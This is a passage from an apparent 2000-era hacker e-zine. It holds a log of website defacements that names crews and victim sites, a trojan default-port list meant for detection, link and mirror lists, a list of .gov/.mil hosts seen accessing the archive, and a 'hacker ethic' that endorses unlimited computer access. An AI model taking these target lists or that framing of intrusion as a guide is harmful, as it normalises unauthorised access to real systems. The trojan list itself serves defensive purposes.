[Team Echo] Manchester Area Chamber of Commerce (www.manchester-tn.com) [00.02.13] NT [Crime Boys] LG Electronics Software Development Center (www.lgsi.co.in) [00.02.13] So [kryptek] E-Classified, Inc. (www.e-class.com) [00.02.13] Li [-X-] Cr4sh.Net (www.cr4sh.net) [00.02.13] Bf [Sabu] Artzy (www.artzy.com) [00.02.13] Li [kingstr0ke] Warez Your PC (warezyourpc.com) [00.02.13] NT [RAT] HSR Hoschule Rapperswil (cn-pc30.hsr.ch) [00.02.12] Lr [Coolio] RSA Security Inc. (www.rsa.com) [00.02.12] NT [Cyber Fuckers] Reuters Sweden (www.reuters.se) [00.02.12] So [Cyber Fuckers] Secretaria de Relaciones Exteriores (www.sre.gob.mx) [00.02.12] NT [Crime Boys] Teleplus Tecnologia Eletro Eletronica Ltda (www.teleplus.com.br) [00.02.12] NT [ ] Lammy Industrial Madeireira da Amazonia Ltda (www.lammy.com.br) [00.02.12] NT [Team Echo] Independant Insurance Agents of America (www.iiaa.org) [00.02.12] NT [Crime Boys] FOB Asset Management E Corretora De Seguros (www.fob.com.br) [00.02.12] NT [Carte Blanche] E2 Consultants (www.e2.com) [00.02.12] BI [d0ze] CRC Enterprises (www.crcamp.com) [00.02.12] Lr [lazy hackers] Prevent Child Abuse Kentucky (pcak.net) [00.02.11] NT [DHC] WABN 92.7 (www.wabn.com) [00.02.11] NT [DHC] Vol Business (www.vol-business.net) [00.02.11] NT [RAT] M Utah Access (www.utahaccess.com) [00.02.11] NT [Team Echo] Boy Scout Troop 35, Highland Park, Texas (www.troop35.org) [00.02.11] NT [ ] Boy Scout Troop 10, Honeoye Falls, NY (www.troop10.org) [00.02.11] Bo [ ] Triology (www.triology.net) [00.02.11] NT [pimp] Business Consulting Solutions, Inc. (www.tips.com) [00.02.11] NT [Team Echo] Stichting Seniorweb (www.seniorweb.nl) [00.02.11] NT [DHC] Quantum Dentistry (www.quantumdentistry.com) [00.02.11] NT [i s] National Registered Agents, Inc (www.nrai.com) [00.02.11] NT [DHC] National Business College (www.nationalbusiness.edu) [00.02.11] NT [DHC] Mountain Sports Ltd. (www.mountainsportsltd.com) [00.02.11] So [kryptek] Interlinea 2000 (www.i2000.es) [00.02.11] NT [Saint] Hatfield Christian Church (www.hatfield.co.za) [00.02.11] NT [DHC] Gene Cochran's site (www.genecochran.com) [00.02.11] NT [DHC] FSB Dongola (www.fsbdongola.com) [00.02.11] Li [DLX] C Entertain Eon (www.entertaineon.com) [00.02.11] NT [KabraLzZ] Labin4 Laboratorio de Informatica (www.encontrefacil.com.br) [00.02.11] Bf [Sabu] Cover Connection (www.coverconnection.com) [00.02.11] NT [DHC] Barker Realty (www.barker-realty.com) [00.02.11] NT [DHC] Applied Logical Methods (www.aplomet.com) [00.02.11] Lr [X-Gh0sT] Medianet s.r.l (netserv.mnet.it) [00.02.11] NT [DHC] Education Systems Corporation (fugazzi.educorp.edu) [00.02.11] Lr [Ph0bic] PortoNet (www.portonet.pt) [00.02.10] NT [Mr_Min] NASA GSFC Office of Human Resources (ohr.gsfc.nasa.gov) [00.02.10] Lr [ook-ook] Who is Your Daddy (www.whoisyourdaddy.net) [00.02.10] NT [Team Echo] Troop 62 (www.troop.org) [00.02.10] So [kidblount] Sargon Consulting (www.gosargon.com) [00.02.10] Li [Death Knights] Funda��o Mineira de Educa��o e Cultura (www.fumec.br) [00.02.10] NT [Artech] Allard Group (www.clairant.com) [00.02.09] So [Team Echo] Tennessee Crime Law (www.tncrimlaw.com) [00.02.09] Li [Team Infinity] l33to.com (www.l33to.com) [00.02.09] NT [Team Echo] Asociaci�n Mundial de Radios Comunitarias (www.amarc.org) [00.02.09] So [Team Echo] Newmill Trout & Deer Farm (newmilltrout.com) [00.02.09] NT [Mindmelt] LA.com (ip-250.la.com) [00.02.09] NT [ZeroForce] National Association of State Universities and Land-Grant Colleges (www.nasulgc.org) [00.02.09] Bf [sabu] M Unix CCTV (www.unixcctv.com) [00.02.08] Lr [Trent] JP Miniskirt (www.miniskirt-jp.com) [00.02.08] So [Team Echo] First Music (www.firstmusic.com) [00.02.07] NT [Grupo and Ka0s] Universidad Quetzalcoatl de Irapuato (www.uqi.edu.mx) [00.02.07] NT [ ] C Texas Mint (www.texasmint.com) [00.02.07] BI [KabraLzZ] Ciudad de Santa Fe (www.santafeciudad.gov.ar) [00.02.07] NT [Artech] Rupee Saver (www.rupeesaver.com) [00.02.07] Lr [Check0ut] Mali Embassy in the US (www.maliembassy-usa.org) [00.02.07] NT [Verb0] Panel Components Corporation (www.interpower.com) [00.02.07] NT [Crime Boys] Carvalho e Fernandes Ltda (www.comercialcarvalho.com.br) [00.02.07] So [ ] Council of Conservative Citizens (www.cofcc.org) [00.02.07] NT [Artech] Clairant (www.clairant.com) [00.02.07] NT [Artech] Be Wear 0303 (www.bewear0303.com) [00.02.07] NT [AloneX] La Banda Del Recodo (www.bandaelrecodo.com.mx) [00.02.07] Li [Death Knights] Agencia Brasileira de Noticias (www.abn.com.br) [00.02.06] So [LA|Calif] X Streams (www.xstreams.com) [00.02.06] So [LA|Calif] Wet Jeans (www.wetjeans.com) [00.02.06] NT [dot-slash crew] PKS Porzellanklinik System GmbH (www.porzellanklinik.de) [00.02.06] NT [c0rvus] Planeta Latino (www.planetalatino.com) [00.02.06] NT [KabraLzZ] Funda��o Instituto Brasileiro e Geografia e Estat�stica (www.lep.ibge.gov.br) [00.02.06] Lr [BlacKc0De] University of Chile Hospital (www.hospital.uchile.cl) [00.02.06] NT [KabraLzZ] Escola Agrotecnica Federal de Bambui (www.eafbambui.gov.br) [00.02.06] NT [Protokol] Dupe It (www.dupeit.com) [00.02.06] So [kryptek] Kyung Sung University (voronoi.kyungsung.ac.kr) [00.02.06] NT [suave] Houston Advanced Research Center (koala.harc.edu) [00.02.06] NT [Illusions Team] A Mail server for the Belgium Senate (xmail.senate.be) [00.02.06] NT [suave] Palm Beach County, Florida ISS Firewall (issfire1.co.palm-beach.fl.us) [00.02.05] NT [Illusions Team] Economische Hogeschool Sint-Aloysius (www.ehsal.be) [00.02.05] NT [Protokol] Lawrence Research Group (www.xandria.com) [00.02.05] Li [ ] WOH Crew (www.wohcrew.com) [00.02.05] Bf [DHC] SLTD Digital Design (www.sltd.com) [00.02.05] Ir [Illusions Team] Southern California Regional Occupational Center (www.scroc.com) [00.02.05] Li [Trent] Nirver Radio (www.nirveradio.com) [00.02.05] Bf [(/)�/-�_�] Air & Waste Management Association (www.environmentalshop.com) [00.02.05] Bf [DHC] eKitchen News (www.ekitchennews.com) [00.02.05] So [ ] Altavista Careers (careers.altavista.com) [00.02.05] Li [mOs] Sony Entertainment Television India (www.setindia.com) [00.02.05] Lr [Illusions Team] A One True Dave (www.otd.com) [00.02.05] NT [ ] DTR Software (www.dtr-software.com) [00.02.05] NT [#Dorknet] Crime Watch S.A. (www.crimewatch.co.za) [00.02.05] NT [ ] BYU Bioag Computing (venom.byu.edu) [00.02.05] So [kryptek] C Kyung Sung University (dolphin.kyungsung.ac.kr) [00.02.04] NT [Wild Karrde] Westcon Inc. (www.westcon.com) [00.02.04] Li [NeoTek] Tyranny.org (www.tyranny.org) [00.02.04] NT [Illusions Team] A Metris N.V. (www.metris.be) [00.02.04] NT [tws] Faith Center (www.cfaith.org) [00.02.04] [Cyb3r Fuck3rs] Instituto Nacional de Metrologia, Normalizacao e Qualidade Industrial (www.inmetro.gov.br) [00.02.04] Li [InSt|nCt] SGlyne (www.sglyne.com) [00.02.04] NT [snow] Enoch (www.enoch.com) [00.02.04] Lr [Dor] Dream Shell (www.dreamshell.com) [00.02.04] NT [snow] Chord Board (www.chordboard.com) [00.02.03] NT [confusion] Yolo County (www.yolocounty.org) [00.02.03] NT [confusion] La Salle College High School (www.lschs.wyndmoor.pa.us) [00.02.03] Li [ph33r the b33r] LG Enterprises (www.lgenterprises.threadnet.com) [00.02.03] NT [akt0r] ImagiNet S.A. (www.imaginet.co.za) [00.02.03] NT [Crime Boys] Communications Projects and Computing (www.compcom.com.au) [00.02.03] NT [Team Echo] Crawford Communications, Inc (www.centralindiana.com) [00.02.03] NT [confusion] Ocean County, New Jersey (webhost.co.ocean.nj.us) [00.02.03] NT [confusion] Culver City, California Name Server (ns1.culver-city.ca.us) [00.02.03] NT [confusion] North Carolina, Moore County Web site (mccs.co.moore.nc.us) [00.02.02] NT [VSO Inc.] Companhia De Informatica Do Parana - Celepar (www.tcefl.pr.gov.br) [00.02.02] NT [Tr1pl3 S31S] Roderick & Martin, Professional Auctioneers (www.rodmar.co.za) [00.02.02] Li [SoiraM] Partizan Football Club, Belgrade (www.partizan.co.yu) [00.02.02] NT [protokol] Madera County School District (www.maderacoe.k12.ca.us) [00.02.02] NT [KabraLzZ] Colombia Departamento Nacional de Planificaci�n (www.dnp.gov.co) [00.02.02] Lr [ner0tec] Keene State College CS Department (www.csdept.keene.edu) [00.02.02] NT [The Killer] Corporaci�n Aut�noma Regional de Cundinamarca (www.car.gov.co) [00.02.02] NT [ViPER] Azlan (www.azlan.nl) [00.02.01] Lr [synk] Kyung Sung Sea&Air Co., Ltd. (kssna.com) [00.02.01] 31 [ ] Dark Harbingers (www.darkharbingers.com) [00.02.01] Li [p4r4g0n3] Fantex (www.fantex.com) [00.02.01] NT [Crime Boys] JVC Info (www.jvcinfo.com) [00.02.01] NT [The Killer] Romanian Ministry of Research and Technology (www.mct.ro) [00.02.01] NT [TWS] South Christian High School (www.schs.org) [00.02.01] So [fsk] C Japanese Institute of Space and Astronautical Science, VLBI Space Observatory Programme (www.vsop.isas.ac.jp) and more sites at the attrition cracked web sites mirror: http://www.attrition.org/mirror/attrition/index.html ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ By: joakim.von.braun@risab.se Source: PSS Common Trojan ports to watch for: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ After seeing several questions about traffic directed at ports as 31337 and 12345 I've put together a list of all trojans known to me and the default ports they are using. Of course several of them could use any port, but I hope this list will maybe give you a clue of what might be going on. port 21 - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash port 23 - Tiny Telnet Server port 25 - Antigen, Email Password Sender, Haebu Coceda, Shtrilitz Stealth, Terminator, WinPC, WinSpy port 31 - Hackers Paradise port 80 - Executor port 456 - Hackers Paradise port 555 - Ini-Killer, Phase Zero, Stealth Spy port 666 - Satanz Backdoor port 1001 - Silencer, WebEx port 1011 - Doly Trojan port 1170 - Psyber Stream Server, Voice port 1234 - Ultors Trojan port 1245 - VooDoo Doll port 1492 - FTP99CMP port 1600 - Shivka-Burka port 1807 - SpySender port 1981 - Shockrave port 1999 - BackDoor port 2001 - Trojan Cow port 2023 - Ripper port 2115 - Bugs port 2140 - Deep Throat, The Invasor port 2801 - Phineas Phucker port 3024 - WinCrash port 3129 - Masters Paradise port 3150 - Deep Throat, The Invasor port 3700 - Portal of Doom port 4092 - WinCrash port 4590 - ICQTrojan port 5000 - Sockets de Troie port 5001 - Sockets de Troie port 5321 - Firehotcker port 5400 - Blade Runner port 5401 - Blade Runner port 5402 - Blade Runner port 5569 - Robo-Hack port 5742 - WinCrash port 6670 - DeepThroat port 6771 - DeepThroat port 6969 - GateCrasher, Priority port 7000 - Remote Grab port 7300 - NetMonitor port 7301 - NetMonitor port 7306 - NetMonitor port 7307 - NetMonitor port 7308 - NetMonitor port 7789 - ICKiller port 9872 - Portal of Doom port 9873 - Portal of Doom port 9874 - Portal of Doom port 9875 - Portal of Doom port 9989 - iNi-Killer port 10067 - Portal of Doom port 10167 - Portal of Doom port 11000 - Senna Spy port 11223 - Progenic trojan port 12223 - Hack�99 KeyLogger port 12345 - GabanBus, NetBus port 12346 - GabanBus, NetBus port 12361 - Whack-a-mole port 12362 - Whack-a-mole port 16969 - Priority port 20001 - Millennium port 20034 - NetBus 2 Pro port 21544 - GirlFriend port 22222 - Prosiak port 23456 - Evil FTP, Ugly FTP port 26274 - Delta port 31337 - Back Orifice port 31338 - Back Orifice, DeepBO port 31339 - NetSpy DK port 31666 - BOWhack port 33333 - Prosiak port 34324 - BigGluck, TN port 40412 - The Spy port 40421 - Masters Paradise port 40422 - Masters Paradise port 40423 - Masters Paradise port 40426 - Masters Paradise port 47262 - Delta port 50505 - Sockets de Troie port 50766 - Fore port 53001 - Remote Windows Shutdown port 61466 - Telecommando port 65000 - Devil You'll find the list on the following address: http://www.simovits.com/nyheter9902.html (still in Swedish but it will be translated in the near future). To help anyone to detect trojan attacks, I�m planning to add information about the original names of the executables, their size, where they usually are hiding, and the names of any helpfiles they may use. I will also add tools or links to tools that may be of your assistance. Feel free to get back to me with any comments or suggestions. If you find new trojans I�ll love to get my hands on them, but please mail me first, as I don�t need more than one copy. If you have live experiance of trojan attacks I�m interested to read about your findings. Joakim joakim.von.braun@risab.se A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ HWA.hax0r.news Mirror Sites around the world: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp ** NEW ** http://datatwirl.intranova.net ** NEW ** http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW ** http://net-security.org/hwahaxornews ** NEW ** http://www.sysbreakers.com/hwa ** NEW ** http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.hackunlimited.com/zine/hwa/ *UPDATED* http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa.*DOWN* http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ http://hwa.hax0r.news.8m.com/ http://www.fortunecity.com/skyscraper/feature/103/ International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: http://securax.org/cum/ *New address* Brasil........: http://www.psynet.net/ka0z http://www.elementais.cjb.net Canada .......: http://www.hackcanada.com Croatia.......: http://security.monitor.hr Colombia......: http://www.cascabel.8m.com http://www.intrusos.cjb.net Finland ........http://hackunlimited.com/ Germany ........http://www.alldas.de/ http://www.security-news.com/ Indonesia.....: http://www.k-elektronik.org/index2.html http://members.xoom.com/neblonica/ http://hackerlink.or.id/ Netherlands...: http://security.pine.nl/ Russia........: http://www.tsu.ru/~eugene/ Singapore.....: http://www.icepoint.com South Africa ...http://www.hackers.co.za http://www.hack.co.za ** BACK ONLINE AS OF FEB 22ND ** http://www.posthuman.za.net Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine. .za (South Africa) sites contributed by wyzwun tnx guy... Got a link for this section? email it to cruciphux@dok.org and i'll review it and post it here if it merits it. @HWA A.2 Hot Hits ~~~~~~~~ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= Today the spotlight may be on you, some interesting machines that have accessed these archives recently... _ _ _ | | | | ___ | |_ | |_| |/ _ \| __| | _ | (_) | |_ |_| |_|\___/ \__| _ _ _ _ | | | (_) | | |__| |_| |_ ___ | __ | | __/ __| | | | | | |_\__ \ |_| |_|_|\__|___/ .gov and .mil activity Updated Feb 2000 ag.ncis.navy.mil obgate,hill.af.mil hqs-ras-p34.ncr.disa.mil proxy.san.mrms.navy.mil security3.nrl.navy.mil shq-ot-1178.nosc.mil legion.dera.gov.uk bogon.llnl.gov dogpatch.llnl.gov fitzgerald.ags.bnl.gov zephyr1.pnl.gov ihvideo.lewisham.gov.uk shihonage.gsfc.nasa.gov burnia.dmz.health.nsw.gov.au ococ.oc.ca.gov guardian.gov.sg aragorn.dpa.act.gov.au ipaccess.gov.ru eagle-ts222.korea.army.mil gate1.noc.usmc.mil eagle-ts209.korea.army.mil proxy.vandenberg.af.mil lax.dcmdw.dla.mil beowulf.ramstein.af.mil cofcs71.aphis.usda.gov samds4.sam.pentagon.mil eg-016-045.eglin.af.mil pacfa.evepier.navy.mil obgate.hill.af.mil biglost.inel.gov marshall.state.gov flatline.arc.nasa.gov mars.istac.gov gateway1.osd.mil gateway3.osd.mil elan5172.cbcph.navy.mil proxy.gintic.gov.sg doegate.doe.gov sunspot.gsfc.nasa.gov gate1.mcbh.usmc.mil homer.nawcad.navy.mil maggie.nawcad.navy.mil lisa.nawcad.navy.mil msproxy.transcom.mil b-kahuna.hickam.af.mil sc034ws109.nosc.mil infosec.se gate2.mcbutler.usmc.mil sc034ws109.nosc.mil shq-ot-1178.nosc.mil dhcp-036190.scott.af.mil mcreed.lan.teale.ca.gov dodo.nist.gov mc1926.mcclellan.af.mil kwai11.nsf.gov enduser.faa.gov vasfw02,fdic.gov lisa.defcen.gov.au ps1.pbgc.gov guardian.gov.sg amccss229116.scott.af.mil sc022ws224.nosc.mil sheppard2.hurlburt.af.mil marshall.us-state.gov digger1.defence.gov.au firewall.mendoza.gov.ar ipaccess.gov.ru gatekeeper.itsec-debis.de fgoscs.itsec-debis.de fhu-ed4ccdf.fhu.disa.mil citspr.tyndall.af.mil kelsatx2.kelly.af.mil kane.sheppard.af.mil relay5.nima.mil host.198-76-34-33.gsa.gov ntsrvr.vsw.navy.mil saic2.nosc.mil wygate.wy.blm.gov mrwilson.lanl.gov p722ar.npt.nuwc.navy.mil ws088228.ramstein.af.mil car-gw.defence.gov.au unknown-c-23-147.latimes.com nytgate1.nytimes.com There are some interesting machines among these, the *.nosc.mil boxes are from SPAWAR information warfare centres, good Is It Worth It Followup to see our boys keeping up with the news... - Ed @HWA A.3 Mirror Sites List ~~~~~~~~~~~~~~~~~ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= __ __ _ | \/ (_)_ __ _ __ ___ _ __ ___ | |\/| | | '__| '__/ _ \| '__/ __| | | | | | | | | | (_) | | \__ \ |_| |_|_|_| |_| \___/|_| |___/ Some of these are not keeping up with new issues like they should be, you can always get the latest issue from www.csoft.net/~hwa or join us on IRC (EFnet) in channel #hwa.hax0r.news and check the topic or ask Cruciphux where the latest issues may be attained. I also upload all issues to etext.org, the zines are available thru their ftp service, updates are slow. - Ed New mirror sites *** http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp *** NEW *** *** http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ *** http://datatwirl.intranova.net * NEW * http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ http://net-security.org/hwahaxornews http://www.attrition.org/hosted/hwa/ http://hwazine.cjb.net/ http://www.hackunlimited.com/files/secu/papers/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ * http://hwa.hax0r.news.8m.com/ * http://www.fortunecity.com/skyscraper/feature/103/ * Crappy free sites of no use to anyone. too lazy to kill em. *** Most likely to be up to date other than the main site. HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net thanks to airportman for the Cubesoft bandwidth. Also shouts out to all our mirror sites! and p0lix for the (now expired) digitalgeeks archive tnx guys. http://www.csoft.net/~hwa HWA.hax0r.news Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT ** http://www.csoft.net/~hwa/ http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.projectgamma.com/archives/zines/hwa/ http://www.403-security.org/Htmls/hwa.hax0r.news.htm @HWA A.4 The hacker's Ethic (90's Style) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ _ _ _ _____ _ _ _ | | | | __ _ ___| | _____ _ __( )__| ____| |_| |__ (_) ___ | |_| |/ _` |/ __| |/ / _ \ '__|/ __| _| | __| '_ \| |/ __| | _ | (_| | (__| < __/ | \__ \ |___| |_| | | | | (__ |_| |_|\__,_|\___|_|\_\___|_| |___/_____|\__|_| |_|_|\___| Sadly, due to the traditional ignorance and sensationalizing of the mass media, the once-noble term hacker has become a perjorative. Among true computer people, being called a hacker is a compliment. One of the traits of the true hacker is a profoundly antibureaucratic and democratic spirit. That spirit is best exemplified by the Hacker's Ethic. This ethic was best formulated by Steven Levy in his 1984 book Hackers: Heroes of the Computer Revolution. Its tenets are as follows: 1 - Access to computers should be unlimited and total. 2 - All information should be free. 3 - Mistrust authority - promote decentralization. 4 - Hackers should be judged by their hacking not bogus criteria such as degrees, age, race, or position. 5 - You create art and beauty on a computer, 6 - Computers can change your life for the better. The Internet as a whole reflects this ethic. @HWA A.5 Sources *** (VERY incomplete) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ____ / ___| ___ _ _ _ __ ___ ___ ___ \___ \ / _ \| | | | '__/ __/ _ Y __| ___) | (_) | |_| | | | (_| __|__ \ |____/ \___/ \__,_|_| \___\___|___/ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. News site.........................http://www.ukhackers.com/ *NEW* News site.........................http://www.hackernews.com.br/ *NEW* News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ *News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/ NewsTrolls .(daily news ).........http://www.newstrolls.com/ General Security/Exploits.........http://packetstorm.securify.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+Security................http://www.gammaforce.org/ News site+Security................http://www.projectgamma.com/ News site+Security................http://securityhole.8m.com/ News site+Security related site...http://www.403-security.org/ News/Humour site+ ................http://www.innerpulse.com News/Techie news site.............http://www.slashdot.org * HNN Also archives back issues of their news, use the following url format http://www.hackernews.com/arch.html?012700 where 01=Jan 27=Date 00=Year. They are archived here also as part of the compilation and broad archival concept we are trying to maintain with this publication. - Ed +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq win2kbugtraq <+others> @HWA A.6 Resources ~~~~~~~~~ ___ | _ \___ ______ _ _ _ _ __ ___ ___ | / -_|_-< _ \ || | '_/ _/ -_|_-< |_|_\___/__|___/\_,_|_| \__\___/__/ NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ PLEASE if you have any changes or additions for this section please mail them to cruciphux@dok.org. Thank you. http://www.newsnow.co.uk/-NewsFeed.Tech.htm *NEW* from Tep http://www.cnn.com/SEARCH/ http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0 http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack http://www.ottawacitizen.com/business/ http://search.yahoo.com.sg/search/news_sg?p=hack http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack http://www.zdnet.com/zdtv/cybercrime/ http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm http://freespeech.org/eua/ Electronic Underground Affiliation http://ech0.cjb.net ech0 Security http://axon.jccc.net/hir/ Hackers Information Report http://net-security.org Net Security http://www.403-security.org Daily news and security related site http://www.hack.co.za/ Current exploits archive ** BACK ONLINE AS OF FEB 22ND ** ** Due to excessive network attacks this site was being mirrored at http://www.siliconinc.net/hack/ if the above link is down again try here. Please send in links that you think should belong here to keep this section up to date, it is overdue updating!. A.7 Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ ____ _ _ _ / ___| _ _| |__ _ __ ___ (_)___ ___(_) ___ _ __ ___ \___ \| | | | '_ \| '_ ` _ \| / __/ __| |/ _ \| '_ \/ __| ___) | |_| | |_) | | | | | | \__ \__ \ | (_) | | | \__ \ |____/ \__,_|_.__/|_| |_| |_|_|___/___/_|\___/|_| |_|___/ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed A.8 Mailing list Info ~~~~~~~~~~~~~~~~~ Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html ATTRITION.ORG's Website defacement mirror and announcement lists ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.attrition.org/mirror/attrition/ http://www.attrition.org/security/lists.html -- defaced [web page defacement announce list] This is a public LOW VOLUME (1) mail list to circulate news/info on defaced web sites. To subscribe to Defaced, send mail to majordomo@attrition.org with "subscribe defaced" in the BODY of the mail. There will be two types of posts to this list: 1. brief announcements as we learn of a web defacement. this will include the site, date, and who signed the hack. we will also include a URL of a mirror of the hack. 2. at the end of the day, a summary will be posted of all the hacks of the day. these can be found on the mirror site listed under 'relevant links' This list is for informational purposes only. Subscribing denotes your acceptance of the following: 1. we have nothing to do with the hacks. at all. 2. we are only mirroring the work of OTHER people. 3. we can not be held liable for anything related to these hacks. 4. all of the points on the disclaimer listed below. Under no circumstances may the information on this list be used to solicit security business. You do not have permission to forward this mail to anyone related to the domain that was defaced. enjoy. List maintainer: mcintyre@attrition.org Hosted by: majordomo@attrition.org Relevant Links: Disclaimer: http://www.attrition.org/mirror/attrition/notes.html ATTRITION Mirror: http://www.attrition.org/mirror/ (1) It is low volume on a normal day. On days of many defacements, traffic may be increased. On a few days, it is a virtual mail flood. You have been warned. ;) -=- -- defaced summary [web page defacement announce list] This is a low traffic mail list to announce all publicly defaced domains on a given day. To subscribe to Defaced-Summary, send mail to majordomo@attrition.org with "subscribe defaced-summary" in the BODY of the mail. There will be ONE type of post to this list: 1. a single nightly piece of mail listing all reported domains. the same information can be found on http://www.attrition.org/mirror/attrition/ via sporadic updates. This list is for informational purposes only. Subscribing denotes your acceptance of the following: 1. we have nothing to do with the hacks. at all. 2. we are only mirroring the work of OTHER people. 3. we can not be held liable for anything related to these hacks. 4. all of the points on the disclaimer listed below. Under no circumstances may the information on this list be used to solicit security business. You do not have permission to forward this mail to anyone related to the domain that was defaced. enjoy. List maintainer: jericho@attrition.org Hosted by: majordomo@attrition.org Relevant Links: Disclaimer: http://www.attrition.org/mirror/attrition/notes.html ATTRITION Mirror: http://www.attrition.org/mirror/ -=- defaced GM [web page defacement announce list] This is a low traffic mail list to announce all publicly defaced government and military domains on a given day. To subscribe to Defaced-GM, send mail to majordomo@attrition.org with "subscribe defaced-gm" in the BODY of the mail. There will be ONE type of post to this list: 1. sporadic pieces of mail for each government (.gov) or military (.mil) system defaced. the same information can be found on http://www.attrition.org/mirror/attrition/ via sporadic updates. This list is designed primarily for government and military personell charged with tracking security incidents on government run networks. This list is for informational purposes only. Subscribing denotes your acceptance of the following: 1. we have nothing to do with the hacks. at all. 2. we are only mirroring the work of OTHER people. 3. we can not be held liable for anything related to these hacks. 4. all of the points on the disclaimer listed below. Under no circumstances may the information on this list be used to solicit security business. You do not have permission to forward this mail to anyone related to the domain that was defaced. enjoy. List maintainer: jericho@attrition.org Hosted by: majordomo@attrition.org Relevant Links: Disclaimer: http://www.attrition.org/mirror/attrition/notes.html ATTRITION Mirror: http://www.attrition.org/mirror/ -- defaced alpha [web page defacement announce list] This is a low traffic mail list to announce via alpha-numeric pagers, all publicly defaced government and military domains on a given day. To subscribe to Defaced-Alpha, send mail to majordomo@attrition.org with "subscribe defaced-alpha" in the BODY of the mail. There will be ONE type of post to this list: 1. sporadic pieces of mail for each government (.gov) or military (.mil) system defaced. the information will only include domain names. the same information can be found on http://www.attrition.org/mirror/attrition/ via sporadic updates. This list is designed primarily for government and military personell charged with tracking security incidents on government run networks. Further, it is designed for quick response and aimed at law enforcement agencies like DCIS and the FBI. To subscribe to this list, a special mail will be sent to YOUR alpha-numeric pager. A specific response must be made within 12 hours of receiving the mail to be subscribed. If the response is not received, it is assumed the mail was not sent to your pager. This list is for informational purposes only. Subscribing denotes your acceptance of the following: 1. we have nothing 